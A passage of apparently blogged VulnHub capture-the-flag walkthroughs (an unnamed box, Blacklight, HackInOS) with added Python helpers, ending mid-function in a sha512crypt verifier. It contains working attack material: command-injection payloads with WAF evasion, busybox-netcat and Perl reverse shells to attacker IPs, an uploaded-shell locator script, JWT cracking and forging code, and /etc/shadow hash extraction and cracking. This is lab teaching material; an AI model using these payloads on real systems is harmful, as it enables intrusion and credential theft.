nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false 
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false 
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false 
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false 
messagebus:x:105:109::/var/run/dbus:/bin/false 
_apt:x:106:65534::/nonexistent:/bin/false 
mysql:x:107:110:MySQL Server,,,:/nonexistent:/bin/false 
uuidd:x:108:113::/run/uuidd:/bin/false 
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash

We find that bob is the only regular user on the box.

After playing around with the file parameter I found out that it is vulnerable to command injection rather than file inclusion: the value is concatenated straight into a shell command line.

<?php echo shell_exec('cat ' . $_GET['file']); ?>
http://192.168.56.105/test.php?file=a;/b?n/un?me%20-a
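
To make the two evasions concrete (the '?' wildcard from the /etc/passwd read above and the ';' chaining here, plus the '$u' padding used in the next request), here is an added Python example that is not part of the original post: it expands the payloads the way sh would, against a constructed temporary filesystem standing in for the target, and shows the detection-side normalisation a WAF or log pipeline could apply. The fake file contents, regexes and function names are my own.

```python
import glob
import os
import re
import tempfile

# Values of the `file` parameter from the requests in this walkthrough;
# the last one is a benign control.
SAMPLE_FILE_PARAMS = [
    "/e?c/?asswd",
    "a;/b?n/un?me -a",
    "last.html; $u ls -la /home/bob",
    "last.html",
]

GLOB_CHARS = re.compile(r"[?*\[]")
SEPARATORS = re.compile(r"([;|&\s]+)")
SHELL_VAR = re.compile(r"\$\w+")


def make_fake_fs() -> str:
    """Constructed stand-in for the target filesystem (sample data, not the real box)."""
    root = tempfile.mkdtemp(prefix="minu-")
    for rel, body in (("etc/passwd", "root:x:0:0:root:/root:/bin/bash\n"),
                      ("bin/uname", "#!/bin/sh\n"),
                      ("home/bob/._pw_", "placeholder\n")):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


def expand_like_shell(token: str, root: str) -> list:
    """Expand ? and * in a path the way sh does, but rooted in `root`."""
    lead = "/" if token.startswith("/") else ""
    pattern = os.path.join(glob.escape(root), token.lstrip("/"))
    return sorted(lead + os.path.relpath(p, root).replace(os.sep, "/")
                  for p in glob.glob(pattern))


def deobfuscate(param: str, root: str) -> str:
    """Rewrite a payload into what the shell actually runs.

    Two ModSecurity evasions are undone: unset variables such as $u expand
    to nothing, and glob-bearing tokens are replaced by the single path
    they match.
    """
    pieces = []
    for piece in SEPARATORS.split(param):
        piece = SHELL_VAR.sub("", piece)
        if GLOB_CHARS.search(piece):
            matches = expand_like_shell(piece, root)
            piece = matches[0] if len(matches) == 1 else piece
        pieces.append(piece)
    return " ".join("".join(pieces).split())


def flags_for(param: str, root: str) -> dict:
    """Detection-side view of one request parameter."""
    normalized = deobfuscate(param, root)
    flags = {
        "glob_obfuscation": bool(GLOB_CHARS.search(param)),
        "empty_var_padding": bool(SHELL_VAR.search(param)),
        "command_chain": bool(re.search(r"[;|&]\s*\S", normalized)),
        "sensitive_path": "/etc/passwd" in normalized,
    }
    flags["suspicious"] = any(flags.values())
    flags["normalized"] = normalized
    return flags


if __name__ == "__main__":
    fs = make_fake_fs()
    for p in SAMPLE_FILE_PARAMS:
        print(f"{p!r:40} -> {flags_for(p, fs)}")
```

The lesson for the defending side is that signature matching on the raw parameter loses to anything the shell will rewrite later; matching on the presence of glob characters and empty variable expansions in a path-like value catches this whole family regardless of which literal string was being hidden.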

If you remember, we found the user bob in /etc/passwd, so let's list bob's home directory and see if there is anything interesting in it. The $u in the payload is an unset shell variable that expands to nothing; it only separates the ';' from the command so that the WAF's signature does not match.

http://192.168.56.105/test.php?file=last.html;%20$u%20ls%20-la%20/home/bob
-rw-r--r-- 1 bob bob 155 Apr 30 2018 ._pw_

We see the file ._pw_ in bob's home directory. To view its contents we can use the head command:

http://192.168.56.105/test.php?file=last.html;%20$u%20head%20/home/bob/._pw_
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

This is three dot-separated base64url-encoded parts: a header, a payload and a signature. We can use the base64 utility to decode each part; the header decodes to {"alg":"HS256","typ":"JWT"} and the payload to:

{"sub":"1234567890","name":"John Doe","iat":1516239022}

So this is a JSON Web Token signed with HMAC-SHA256 over the first two parts. If the secret is weak we can brute-force it offline, for example with c-jwt-cracker.

root@ubuntu:~/src/c-jwt-cracker# ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

Secret is "mlnV1"
root@ubuntu:~/src/c-jwt-cracker#
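
What c-jwt-cracker does is simple enough to reproduce: recompute the HMAC-SHA256 over header.payload for each candidate secret and compare it to the token's signature. The following is added Python (not from the original post or from c-jwt-cracker) that does that against the token above with a small constructed candidate list, and then shows what the recovered secret buys you: the ability to sign arbitrary claims. The candidate list and function names are my own.

```python
import base64
import hashlib
import hmac
import json

# The token read from /home/bob/._pw_ above.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
         "pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg")

# Constructed candidate list; a real run would feed a wordlist or brute force.
CANDIDATES = ["secret", "password", "your-256-bit-secret", "bob", "mlnV1"]


def b64url_decode(s: str) -> bytes:
    """JWT strips base64 padding; put it back before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_jwt(token: str):
    """Return (header, payload, raw signature) without verifying anything."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload, b64url_decode(sig_b64)


def verify_hs256(token: str, secret: str) -> bool:
    """True if `secret` reproduces the token's HMAC-SHA256 signature."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":        # never let the token pick the algorithm
        return False
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def crack_hs256(token: str, candidates):
    """Offline dictionary attack: the first candidate that verifies is the secret."""
    for secret in candidates:
        if verify_hs256(token, secret):
            return secret
    return None


def forge_hs256(claims: dict, secret: str) -> str:
    """Once the secret is known, any claims can be signed as if by the server."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"},
                                      separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(),
                   hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


if __name__ == "__main__":
    print(decode_jwt(TOKEN)[:2])
    print("secret:", crack_hs256(TOKEN, CANDIDATES))
```

Nothing in the token slows the attacker down: HMAC-SHA256 is fast, there is no salt, and the work is entirely offline, so an HS256 secret needs the entropy of a real key, not of a password.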

So now we have the secret, but first we need a shell on the box so we can issue commands from there instead of bypassing the WAF every time. One way we can do this is with BusyBox, which combines tiny versions of many common UNIX utilities into a single small executable, including a netcat that supports -e:

http://192.168.56.105/test.php?file=a;busybox nc 192.168.56.107 4444 -e sh -i

If we setup a listener on our local box we get a connect back and drop to a shell.

root@kali:~# nc -v  -l -p 4444
listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Unknown host
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 48922


BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/var/www/html$

If we try to su to bob with the password 'mlnV1' we get denied, but if we try to su to root we get a root shell. So the secret stored in bob's home directory is the root password of the box. When we cd to /root we see the flag.

Tuesday, October 15, 2019

VulnHub: Blacklight Walkthrough

Lets first start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sS -sV -sC -Pn -O -T5 -p- 192.168.0.40

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-15 13:39 MDT
Nmap scan report for 192.168.0.40
Host is up (0.00049s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
9072/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequest, DNSVersionBindReq, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe: 
|_    BLACKLIGHT console mk1. Type .help for instructions
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9072-TCP:V=7.60%I=7%D=10/15%Time=5DA62126%P=x86_64-pc-linux-gnu%r(N
SF:ULL,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20inst
SF:ructions\n")%r(GenericLines,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\
SF:x20\.help\x20for\x20instructions\n")%r(GetRequest,34,"BLACKLIGHT\x20con
SF:sole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(HTTPOption
SF:s,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instru
SF:ctions\n")%r(RTSPRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20
SF:\.help\x20for\x20instructions\n")%r(RPCCheck,34,"BLACKLIGHT\x20console\
SF:x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(DNSVersionBindR
SF:eq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instr
SF:uctions\n")%r(DNSStatusRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Ty
SF:pe\x20\.help\x20for\x20instructions\n")%r(Help,34,"BLACKLIGHT\x20consol
SF:e\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SSLSessionReq
SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc
SF:tions\n")%r(TLSSessionReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x2
SF:0\.help\x20for\x20instructions\n")%r(Kerberos,34,"BLACKLIGHT\x20console
SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SMBProgNeg,34,
SF:"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruction
SF:s\n")%r(X11Probe,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x
SF:20for\x20instructions\n")%r(FourOhFourRequest,34,"BLACKLIGHT\x20console
SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(LPDString,34,"
SF:BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions
SF:\n")%r(LDAPSearchReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.he
SF:lp\x20for\x20instructions\n")%r(LDAPBindReq,34,"BLACKLIGHT\x20console\x
SF:20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SIPOptions,34,"B
SF:LACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\
SF:n")%r(LANDesk-RC,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x
SF:20for\x20instructions\n")%r(TerminalServer,34,"BLACKLIGHT\x20console\x2
SF:0mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(NCP,34,"BLACKLIGH
SF:T\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n");
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.99 seconds
root@ubuntu:~# 

Nmap found two open ports, 80 and 9072. Let's fire up dirb and start looking for interesting directories.

---- Scanning URL: http://192.168.0.40/ ----
==> DIRECTORY: http://192.168.0.40/css/                                                                                                                 
==> DIRECTORY: http://192.168.0.40/fonts/                                                                                                               
==> DIRECTORY: http://192.168.0.40/footer/                                                                                                              
==> DIRECTORY: http://192.168.0.40/img/                                                                                                                 
+ http://192.168.0.40/index.html (CODE:200|SIZE:1759)                                                                                                   
==> DIRECTORY: http://192.168.0.40/javascript/                                                                                                          
==> DIRECTORY: http://192.168.0.40/js/                                                                                                                  
+ http://192.168.0.40/robots.txt (CODE:200|SIZE:40)                                                                                                     
+ http://192.168.0.40/server-status (CODE:403|SIZE:300)                                                                                                 
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/footer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/javascript/ ----
==> DIRECTORY: http://192.168.0.40/javascript/jquery/                                                                                                   
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                        
---- Entering directory: http://192.168.0.40/javascript/jquery/ ----
+ http://192.168.0.40/javascript/jquery/jquery (CODE:200|SIZE:268026)

Dirb came back with a few listable directories, but none of them led anywhere useful. It did confirm that a robots.txt exists, so we fetch that next.

User-agent: *
flag1.txt
blacklight.dic

The robots.txt file has two entries: flag1.txt, and blacklight.dic, which looks like a dictionary (wordlist) file. We save the wordlist for later and read the flag.

{flag1:fc4c7223964a26b152823d14f129687207e7fe15}

9072. The secret is at home.

Let's move on to port 9072. Connecting to it gives a console that lets us run commands, with one catch: after two commands the server locks itself and stops accepting input, so every command has to count. We first try the .readhash command to retrieve a hash.

b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6

The other commands available to us are .exec and .quit. With one command left, we use .exec to spawn a reverse shell back to our box (the Perl one-liner below connects to 192.168.0.42 on port 4444, so a listener has to be waiting there before we send it).

BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec  - Execute commands
.quit - Exit the server

.exec perl -e 'use Socket;$i="192.168.0.42";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We get a connect back as root. Now let's find the other flags. The flag1 clue said the secret is at home, so we cd to /home.

root@blacklight:/home# cd blacklight

root@blacklight:/home/blacklight# ls -la

total 48
drwxr-xr-x 6 blacklight blacklight 4096 Jun  7  2018 .
drwxr-xr-x 3 root       root       4096 Jun  7  2018 ..
-rw------- 1 blacklight blacklight 1019 Jun  8  2018 .bash_history
-rw-r--r-- 1 blacklight blacklight  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 blacklight blacklight 3771 Apr  4  2018 .bashrc
drwx------ 2 blacklight blacklight 4096 Jun  7  2018 .cache
-rwxrwxr-x 1 blacklight blacklight 1019 Jun  7  2018 console.rb
drwx------ 3 blacklight blacklight 4096 Jun  7  2018 .gnupg
-rw-r--r-- 1 root       root         65 Jun  7  2018 hash.txt
drwxrwxr-x 3 blacklight blacklight 4096 Jun  7  2018 .local
-rw-r--r-- 1 blacklight blacklight  666 Jun  7  2018 .profile
drwxr-xr-x 2 root       root       4096 Jun  7  2018 .secret
-rw-r--r-- 1 blacklight blacklight    0 Jun  7  2018 .sudo_as_admin_successful
root@blacklight:/home/blacklight#

The .secret directory holds the flag2 image. We download it and use the steganography tool outguess to extract the data hidden inside (-r retrieves the embedded message into flag2.txt).

sam@ubuntu:~$ outguess -r flag2-inside.jpg flag2.txt
Reading flag2-inside.jpg....
Extracting usable bits:   18496 bits
Steg retrieve: seed: 180, len: 133
sam@ubuntu:~$ cat flag2.txt 
{flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4}

Francis Bacon says: 
BAAAAAABAAAAAAAAAABB AABAABAABAAAABA AAAABAAAAAAAABAABBABABBAA
sam@ubuntu:~$ 
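The A/B string is a Bacon cipher. As an added example (my code, not from the original post), here is a decoder that turns the hint outguess extracted into text using Bacon's original 24-letter alphabet, in which I/J and U/V share a code; with that alphabet the three groups decode to READ, ETC and BACON. Groups of the wrong length or codes outside the alphabet are rejected rather than silently skipped.

```python
"""Added example (not from the original post): decode the Bacon cipher
hint that outguess recovered from the flag2 image."""

# Bacon's original 24-letter alphabet: I/J and U/V share a code, so the
# codes BBAAA..BBBBB are unused and signal a 26-letter variant instead.
BACON_ALPHABET = "ABCDEFGHIKLMNOPQRSTUWXYZ"


def bacon_table():
    """Map each 5-symbol A/B code to its letter (A=AAAAA, B=AAAAB, ...)."""
    return {
        format(i, "05b").replace("0", "A").replace("1", "B"): letter
        for i, letter in enumerate(BACON_ALPHABET)
    }


def decode_bacon(text):
    """Decode whitespace-separated groups of A/B symbols into words.

    Raises ValueError for a group whose length is not a multiple of 5,
    that contains symbols other than A/B, or that uses a code with no
    letter in the 24-letter alphabet.
    """
    table = bacon_table()
    words = []
    for group in text.split():
        if len(group) % 5 or set(group) - {"A", "B"}:
            raise ValueError(f"bad Bacon group: {group!r}")
        letters = []
        for i in range(0, len(group), 5):
            code = group[i:i + 5]
            if code not in table:
                raise ValueError(f"code {code} has no letter in the 24-letter alphabet")
            letters.append(table[code])
        words.append("".join(letters))
    return " ".join(words)


# The hint exactly as outguess printed it above
HINT = "BAAAAAABAAAAAAAAAABB AABAABAABAAAABA AAAABAAAAAAAABAABBABABBAA"

if __name__ == "__main__":
    print(decode_bacon(HINT))
```

If a decode produces nonsense, try the 26-letter variant (a distinct code per letter) before assuming the extraction is wrong; the two alphabets diverge from the letter J onward.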

Monday, October 14, 2019

VulnHub: HackInOS Walkthrough

Lets start off with a nmap scan of the remote host.

root@ubuntu:~# nmap -sS -sV -sC -O -T5 -Pn 192.168.0.35

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-14 16:37 MDT
Nmap scan report for 192.168.0.35
Host is up (0.00060s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA)
|   256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA)
|_  256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (EdDSA)
8000/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.0.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 2 disallowed entries 
|_/upload.php /uploads
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blog – Just another WordPress site
MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.35 seconds
root@ubuntu:~# 

nmap gives us some interesting results: an HTTP server on port 8000 that looks like a default WordPress site, and a robots.txt with two disallowed entries. Let's see what robots.txt says.

http://192.168.0.35:8000/robots.txt

User-agent:*
Disallow:/upload.php
Disallow:/uploads

We get a 403 Forbidden on the /uploads directory, but /upload.php is accessible. Viewing the source of upload.php turns up a hint, a link to the script's source code:

https://github.com/fatihhcelik/Vulnerable-Machine---Hint/blob/master/upload.php

This is the source code of upload.php, and it has some vulnerabilities. The first thing that stands out is how the stored filename is built with md5().

$rand_number = rand(1,100);
$target_dir = "uploads/";
$target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
$file_name = $target_dir . basename($_FILES["file"]["name"]);

It takes the uploaded file's name, appends a random number between 1 and 100, and uses the MD5 hash of that string as the name of the stored file. Because rand(1,100) has only 100 possible outcomes, the stored name is not really hidden: we can compute every possible hash for our filename and request each one until the server answers 200. The Perl script below does exactly that.

#!/usr/bin/env perl
# Find where upload.php stored our file: the name is
# md5(<original name> . rand(1,100)) plus the original extension,
# so there are only 100 candidates to request.
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;

my $host = "http://192.168.0.35:8000";
my $file = "php-reverse-shell.php";    # name we uploaded the shell as

my $ua = LWP::UserAgent->new(timeout => 10);

# one candidate per value rand(1,100) can return
my @files = map { md5_hex($file . $_) . ".php" } (1 .. 100);

foreach my $candidate (@files) {
    my $res = $ua->get("$host/uploads/$candidate");
    if ($res->code == 200) {
        print "[+] Page Found (200) OK: $host/uploads/$candidate\n";
    }
}

Next is the file type check. It decides whether the upload is an image in a weak way, trusting the content rather than anything reliable, so it can be bypassed by prepending the GIF signature GIF89a to our PHP code: the check sees a GIF, while PHP simply echoes the header bytes and executes the code after them. For the shell I chose the PHP reverse shell from pentestmonkey.net.

if($check["mime"] == "image/png" || $check["mime"] == "image/gif")

Now we upload the file and run the script we wrote earlier to find the stored name. Requesting the URL it finds executes the shell, and we get a connection back from the remote system on our listener.

root@ubuntu:~# nc -v -l -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 192.168.0.35 54446 received!
Linux 1afdd1f6b82c 4.15.0-29-generic #31~16.04.1-Ubuntu SMP Wed Jul 18 08:54:04 UTC 2018 x86_64 GNU/Linux
 23:37:18 up  1:02,  0 users,  load average: 0.08, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$   

We check /etc/passwd for any additional users on the system that might be of interest to us.

www-data@1afdd1f6b82c:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
www-data@1afdd1f6b82c:/home$ 

We don't find any other users that can log in, so we search for SUID binaries next.

www-data@1afdd1f6b82c:/home$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/tail
/usr/bin/chfn
/bin/mount
/bin/umount
/bin/su
www-data@1afdd1f6b82c:/home$ 

The tail utility is setuid. It therefore runs as its owner (root) no matter who invokes it, so we can use it to read /etc/shadow and pull out root's password hash to crack.

www-data@1afdd1f6b82c:/home$ tail -n25 /etc/shadow
tail -n25 /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
www-data@1afdd1f6b82c:/home$ 

Once we have the hash we fire up John the Ripper with the rockyou wordlist and start cracking.

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/hackinos.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
john             (root)
1g 0:00:00:03 DONE (2019-10-14 17:46) 0.2702g/s 1798p/s 1798c/s 1798C/s honeybear..98765432
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run# 

Cracking didn't take long: the password is simply john. Let's su to root from our www-data shell.
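John's "sha512crypt, crypt(3) $6$" line tells us which scheme the hash uses. As an added example (my code, not from the original post), the following Python reimplements sha512crypt from its public specification and verifies a candidate password against the root line that tail leaked above, which is exactly the per-guess work a cracker does; it also shows how the field splits into $6$[rounds=N$]salt$hash. ROOT_LINE is copied from the shadow output above.

```python
"""Added example (not from the original post): check a candidate password
against a leaked /etc/shadow line by implementing sha512crypt ($6$), the
scheme John identified, without relying on crypt(3) or John itself."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Byte order in which the final digest is emitted (from the sha512crypt spec).
_ORDER = [
    (0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
    (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
    (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
    (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
    (62, 20, 41),
]


def _sha(data):
    return hashlib.sha512(data).digest()


def _repeat_to(digest, length):
    """Repeat a 64-byte digest to exactly `length` bytes."""
    return digest * (length // 64) + digest[: length % 64]


def _b64_from_24bit(b2, b1, b0, n):
    """crypt(3)-style base64: little-endian 6-bit groups of a 24-bit word."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(ITOA64[w & 0x3F])
        w >>= 6
    return "".join(out)


def sha512_crypt(password, salt, rounds=5000):
    """Return the full $6$ hash string for password/salt (salt max 16 chars)."""
    pw = password.encode()
    salt = salt[:16]
    sb = salt.encode()

    b = _sha(pw + sb + pw)                           # digest B
    a_in = pw + sb + _repeat_to(b, len(pw))          # digest A input
    n = len(pw)
    while n:                                         # one term per bit of len(pw)
        a_in += b if n & 1 else pw
        n >>= 1
    a = _sha(a_in)

    p = _repeat_to(_sha(pw * len(pw)), len(pw))      # P sequence
    s = _repeat_to(_sha(sb * (16 + a[0])), len(sb))  # S sequence

    c = a
    for r in range(rounds):                          # the cost factor
        buf = p if r & 1 else c
        if r % 3:
            buf += s
        if r % 7:
            buf += p
        buf += c if r & 1 else p
        c = _sha(buf)

    enc = "".join(_b64_from_24bit(c[i], c[j], c[k], 4) for i, j, k in _ORDER)
    enc += _b64_from_24bit(0, 0, c[63], 2)
    rounds_part = "" if rounds == 5000 else f"rounds={rounds}$"
    return f"$6${rounds_part}{salt}${enc}"


def parse_shadow_hash(field):
    """Split '$6$[rounds=N$]salt$hash' into (rounds, salt, hash)."""
    parts = field.split("$")
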